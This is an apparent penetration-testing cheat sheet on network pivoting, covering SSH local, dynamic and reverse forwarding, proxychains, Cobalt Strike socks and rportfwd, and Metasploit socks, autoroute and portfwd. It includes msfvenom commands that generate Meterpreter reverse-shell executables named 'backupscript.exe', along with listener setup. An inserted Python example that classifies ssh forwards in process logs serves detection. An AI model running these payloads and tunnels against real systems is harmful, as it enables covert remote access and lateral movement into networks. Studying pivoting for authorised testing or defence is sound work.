Dynamic Port Forwarding (SSH + Socks)

Local Port Forward SSH

It forwards connections made to <local-port> on the local machine to <remote-port> on the target server.

# Local Port -> Can be any port
# Remote Port -> The port where the target service is listening on
ssh -L <local-port>:127.0.0.1:<remote-port> <user>@<IP>

# Confirm Port Forwarding
netstat -antp | grep <local-port>

# Forwarding Several Ports
ssh -L <local-port>:localhost:<remote-port> -L <local-port>:localhost:<remote-port> <user>@<IP>

SSH Tunneling over SOCKS Proxy

# SSH Command
ssh -D 1080 <user>@<IP>

# Check Proxychains Conf File
/etc/proxychains.conf
socks4 127.0.0.1 1080

Reverse Port Forwarding SSH

# Generate Reverse Shell, with the IP of the internal host.
msfvenom -p windows/x64/meterpreter/reverse_https lhost=<InternalIPofPivotHost> -f exe -o backupscript.exe LPORT=8080

# Listener that receives the forwarded connection:
# set lport 8000
# set lhost 127.0.0.1

# Reverse Port Forward
ssh -R <InternalIPofPivotHost>:8080:0.0.0.0:8000 ubuntu@<ipAddressofTarget> -vN
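
# Added example: classifying ssh forwards in logged command lines
The -L, -D and -R forms above differ in which end opens the listening port. This added example (not part of the original page) parses ssh client command lines, such as those in process-creation logs, and reports each forward's listener side, bind address and destination. The sample command lines and addresses are constructed, and the option list in TAKES_ARG is an assumption based on the OpenSSH client.

```python
import shlex

LISTENER = {"L": "client", "D": "client", "R": "server"}  # side that opens the port
TAKES_ARG = set("bceilmopBDEFIJLOPQRSwW")  # assumed list of ssh options that take a value
WILDCARD = {"", "*", "0.0.0.0", "::"}      # bind addresses meaning "all interfaces"

def describe(kind, spec):
    """Split [bind_address:]port[:host:hostport]; bracketed IPv6 is not handled."""
    parts = spec.split(":")
    bind = None                            # None = ssh default (loopback unless GatewayPorts)
    if len(parts) in (2, 4):               # explicit bind address present
        bind, parts = parts[0], parts[1:]
    dest = ":".join(parts[1:]) if len(parts) == 3 else "socks"
    return {"flag": "-" + kind, "listens_on": LISTENER[kind], "bind": bind,
            "port": parts[0], "dest": dest, "all_interfaces": bind in WILDCARD}

def parse_forwards(cmdline):
    """Return one record per -L/-R/-D forward in an ssh client command line."""
    args = shlex.split(cmdline)[1:]
    found, seen_host, i = [], False, 0
    while i < len(args):
        arg = args[i]
        i += 1
        if not arg.startswith("-"):
            if seen_host:
                break                      # words after the host are the remote command
            seen_host = True
            continue
        for pos, ch in enumerate(arg[1:], start=1):
            if ch in TAKES_ARG:
                value = arg[pos + 1:]      # "-L8080:..." form
                if not value and i < len(args):
                    value, i = args[i], i + 1   # "-L 8080:..." form
                if ch in LISTENER and value:
                    found.append(describe(ch, value))
                break                      # the value used up the rest of this word
    return found

# Constructed command lines, as they might appear in process-creation logs.
SAMPLES = [
    "ssh -L 8080:127.0.0.1:80 -L 8443:localhost:443 user@192.0.2.10",
    "ssh -NfD 0.0.0.0:1080 user@192.0.2.10",
    "ssh -R 192.0.2.20:8080:0.0.0.0:8000 ubuntu@192.0.2.10 -vN",
    "ssh -p 2222 user@192.0.2.10 ls -L /tmp",   # -L here belongs to ls, not ssh
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(line, "->", parse_forwards(line))
```

For -R, a non-loopback bind address only takes effect when the SSH server's GatewayPorts setting permits it, so a record with "listens_on": "server" shows what was requested, not necessarily what was bound.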

Cobalt Tunneling & Port Forwarding

# Socks4 Proxy
socks 1080

# socks5
socks 1080 socks5 disableNoAuth socks_user socks_password enableLogging

# Reverse Port Forward
rportfwd 

MSF Socks Proxy

use auxiliary/server/socks_proxy
set srvport 1080
set srvhost 0.0.0.0
set version 4a

# Verify Proxy runs
jobs

Metasploit Autoroute

use post/multi/manage/autoroute
set session <session id>
set subnet <ip>
run

# Shorter Method
run autoroute -s <ip>/24

Metasploit Port Forwarding

portfwd add -l <local-port> -p <remote-port> -r <ip>

Metasploit Reverse Forwarding

portfwd add -R -l <local-port> -p <remote-port> -L <tun0>

# Setup Listener
set payload windows/x64/meterpreter/reverse_tcp
set lport <value -l>
set lhost 0.0.0.0
run

# Create Payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<pivot-ip> -f exe -o backupscript.exe LPORT=<remote-port>
